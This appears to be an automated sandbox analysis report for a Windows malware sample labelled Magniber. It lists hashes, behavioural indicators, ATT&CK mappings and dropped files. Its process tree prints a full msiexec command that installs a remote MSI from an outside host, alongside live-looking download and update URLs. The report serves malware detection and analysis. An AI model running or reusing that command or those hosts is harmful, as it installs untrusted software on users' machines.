b09004f5b381bf95496a16aad295c464297f2a2a388e2b6f4ff98d91b3469c68

General

Target

2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe
Size

1.4MB
MD5

6ea915050321267a122455e2ba6b9707
SHA1

3995b6b06e35fc871e7753ae382692479f5fbe0f
SHA256

b09004f5b381bf95496a16aad295c464297f2a2a388e2b6f4ff98d91b3469c68
SHA512

967b6ff41529370969c6a3079b004a864bc50bf80401aefd084c1a784702f0f0f57a91781776c5cc415076a5f82a8d26287cc4e5ae02f9f04020040baf9887d7
SSDEEP

24576:VaQa4u8YsfBZyArv3kAtzw4tS313Kc5wWG7K47A+kRbMtjKo5t/baLxME:VaLKD/yA/znt+ljM+bmjPNmME

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2588	~93qhbrbrae.tmp

Loads dropped DLL 1 IoCs

pid	Process
2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2236	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~93qhbrbrae.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2236	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2236	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2236	MSIEXEC.EXE
2236	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2368 wrote to memory of 2588	2368	2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe	30
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32
PID 2588 wrote to memory of 2236	2588	~93qhbrbrae.tmp	32

C:\Users\Admin\AppData\Local\Temp\2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-12_6ea915050321267a122455e2ba6b9707_magniber.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Users\Admin\AppData\Local\Temp\~93qhbrbrae.tmp
  "C:\Users\Admin\AppData\Local\Temp\~93qhbrbrae.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://clatz.fileslldl.eu/client/pkgs/panda/Loco Panda Casino20150605032747.msi" DDC_DID=1299180 DDC_RTGURL=http://www.filecdn.eu/dl/TrackSetup/TrackSetup.aspx?DID=1299180%26filename=LocoPanda%2Eexe%26CASINONAME=panda DDC_DOWNLOAD_AFFID=54923 DDC_UPDATESTATUSURL=http://77.120.109.204:8080/panda/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://77.120.109.204:8080/panda/Lobby.WebSite/SignUpUnsecure.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~93qhbrbrae.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_isB8AA.tmp

Filesize
1KB

MD5
09acce7811a7554743b562b57148622f

SHA1
d2a77f8e7efe6e1e62e79411350372469b63ee24

SHA256
845e897fd0bd7eb883276c520d594f1fe6cb95f7bc7ac845a482d5c695f508b6

SHA512
28ecf52b0118c4b8c8ce888f0a47ea8895dcb385effeed64f8caffaed82fbaa677f52eb59e51ed737bf58bd9a5ef9936215066ae00bdef78a424e59a22c292f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\{F228540A-1AEC-4E55-A39A-B4A8672754D4}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{F228540A-1AEC-4E55-A39A-B4A8672754D4}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~B897.tmp

Filesize
5KB

MD5
f0886269dd5238239400b4038a5511cd

SHA1
54bfa44a65e76ed34de4b40defe98dd96d4d330f

SHA256
f71c807858048eb15af1f80d21a08a31bad3a6f32230a99ec6fdd30cc58406da

SHA512
6001cdf1b83b4b2167c07c26698de7be5fe02d5c4a4692d30598b58999d0bf4e86018933834864ca9ae1148e410b5c232215fa7a484ab307dd3b6fc15a63ce48

Download Submit
\Users\Admin\AppData\Local\Temp\~93qhbrbrae.tmp

Filesize
1.2MB

MD5
475c98cfe240f322a7b65d8e1f6bb64b

SHA1
cd33e338998b498f151bd39960e562058b7c7a03

SHA256
88ee91892381dc3a823792a383a402de2d765f7763a5aeea2ac07c9c7ac19977

SHA512
a4c7162ae4e657e3cacb0addbb374d6d9c1dd2c708de965442edd1f8e73066d69315795d37085018b0aa0a409756b007873f23f7ee1e0e22ae5fa008ec99ff37

Download Submit

Analysis

Sharing